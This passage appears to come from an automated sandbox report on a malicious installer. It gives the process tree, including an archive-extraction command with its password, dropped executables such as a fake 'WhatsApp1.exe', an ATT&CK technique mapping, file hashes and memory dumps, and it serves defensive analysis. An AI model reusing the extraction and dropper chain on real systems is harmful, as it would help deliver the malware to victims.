      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1244
  - - C:\Program Files\UpgradeValiantSupervisor\NExERxptCnfNovdPQUVKIftjqvLPvD.exe
      "C:\Program Files\UpgradeValiantSupervisor\NExERxptCnfNovdPQUVKIftjqvLPvD.exe" x "C:\Program Files\UpgradeValiantSupervisor\jJdRJSuAKBvtXRTgfinkngKoulBasD" -x!1_ZhObbZwOavDN.exe -x!sss -x!1_YeIgTCQVJGErbtEGGiDlTxgCffkbDZ.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\UpgradeValiantSupervisor\" -p"04434k+1^Z$HJ^mp6+xz" -y
      4⤵
      Drops file in Program Files directory
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious use of AdjustPrivilegeToken
      PID:592
- - C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN.exe
    "C:\Program Files\UpgradeValiantSupervisor\ZhObbZwOavDN.exe" -number 110 -file file3 -mode mode3
    3⤵
    - Drops file in Program Files directory
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2960
- - C:\Program Files\UpgradeValiantSupervisor\WhatsApp1.exe
    "C:\Program Files\UpgradeValiantSupervisor\WhatsApp1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2404
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 2404 -s 632
      4⤵
      PID:2508

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2788

C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000002C4" "0000000000000594"
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Installer Packages

T1546.016

Privilege Escalation

Event Triggered Execution

T1546

Installer Packages

T1546.016

Defense Evasion

System Binary Proxy Execution

T1218

Msiexec

T1218.007

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\f77013b.rbs

Filesize
7KB

MD5
a5dda40cac4aec2b9eb1d60f1d121b70

SHA1
e54d7bba93efc5dcf1eb007309f30a1af4319e4a

SHA256
4580d3b5ce1e75d568ab8b5607fba49a4323e68665db4711d0a6be145a7a3148

SHA512
a977474d01cb256e90dd15baf22ce99fde3fa67ee318543774c7e84f5a6a21d6a7cc5a36b37a2e2fd5e0154aa38499c32e983424736ee6185b51cc301bf05318

Download Submit
C:\Program Files\UpgradeValiantSupervisor\2_ZhObbZwOavDN.exe

Filesize
2.1MB

MD5
124b1390f39511fa043e99578d4fad57

SHA1
9f2e13afe318878167328104b6710ad53f1f168b

SHA256
f65559e20b9473aa23450850ac2a0a6d6045a8987236db6ff9b2b3e448e569e9

SHA512
eb0d19da7f3e775ca6e36f0c51f7a83116a16b6096dd0c5e42ef23a4cdcf2cea805e928092c2adc6c78138455b2b2fb7f62dfe287ead2fb3ee7dd0e86f16c9ac

Download Submit
C:\Program Files\UpgradeValiantSupervisor\FRHCPRDSCKpKTwMdXJauvGnbrrBSLW

Filesize
1.5MB

MD5
3833fb3821f72c1ed7afd41df3e485c5

SHA1
5a2224f9c26e4d9e1e406ecc8a18c2dfb4400ba2

SHA256
d4dd1cf01cc90001906f73290d3e2ddbb3c29f3d6fba25b68e07498d8072fe7f

SHA512
8ec522441c166d4a04604a44b617f8848c6f203c8975702b242180dadc6a7bf5c8e1e0c6f4f742d29058baaeb499d0b64eca0fb90762b7f0224b9c19da7ed19a

Download Submit
C:\Program Files\UpgradeValiantSupervisor\NExERxptCnfNovdPQUVKIftjqvLPvD.exe

Filesize
577KB

MD5
c31c4b04558396c6fabab64dcf366534

SHA1
fa836d92edc577d6a17ded47641ba1938589b09a

SHA256
9d182f421381429fd77598feb609fefb54dcaef722ddbf5aa611b68a706c10d3

SHA512
814dcbc1d43bc037dadc2f3f67856dd790b15fc1b0c50fa74a169c8cc02cdc79d44f1f10e200ef662eee20cd6b5ca646ec4e77673e3fe3cb7dfb7649243f6e99

Download Submit
C:\Program Files\UpgradeValiantSupervisor\WhatsApp1.exe

Filesize
1.0MB

MD5
f90ddf18d65bb3153bcdfdc4856ce2a5

SHA1
611376391f17207d60ca8c2ec81354933f8dac45

SHA256
62eef5a5e363624007bc29a6ecd3275aec2e5a67eef058df404d145c90e3a0ce

SHA512
f3f20f216ab6fd055f8d494f2758512413cb1cf121a2b51cae4e7b371a595b4dfe8ed4213aa759ccc4569ad6ed792f936304bfb4aac2952a79a3b2bccd293316

Download Submit
C:\Program Files\UpgradeValiantSupervisor\jJdRJSuAKBvtXRTgfinkngKoulBasD

Filesize
1.5MB

MD5
7dae674c54e91c0389acc2bba94104fa

SHA1
3104b569de1d4086bc9a691e0c99399920ee6475

SHA256
605d7822ebc5196145cd4a01510b85dcac29fdfff6c48cab892f3dd10c749a9b

SHA512
6e896a29b736c09fbe7abe6e21653f4c9f2e6c26ee4790d371b45935bc075ee865534b9dabf78c2fb2432de2ae6087d4277cf6297fd0eb6e1474ff6d92a0616f

Download Submit
C:\Windows\Installer\f770139.msi

Filesize
37.8MB

MD5
1eb0c7fbfca2f95b76189279eadb9228

SHA1
ef89821dff0b19fb6bac92808f0e42fdd88eb7c7

SHA256
e1fb8b47f237c56c9409de2cd1e04c49a0da76f1b2f62341d97394463f96d323

SHA512
d22f351cbaa2ac225ff9c472c0404098a332bc4de1ca29465d5e6189e3420b2107e7cf6c087dcde0bf05a39668f751484a72386e7055e63be6ba355fea3e4e7e

Download Submit
memory/1188-18-0x00000000022B0000-0x00000000022B8000-memory.dmp

Filesize
32KB

Download
memory/1188-17-0x000000001B4A0000-0x000000001B782000-memory.dmp

Filesize
2.9MB

Download
memory/2404-58-0x0000000000A00000-0x0000000000B02000-memory.dmp

Filesize
1.0MB

Download
memory/2900-12-0x0000000000200000-0x0000000000210000-memory.dmp

Filesize
64KB

Download
memory/2960-59-0x00000000003D0000-0x00000000003FF000-memory.dmp

Filesize
188KB

Download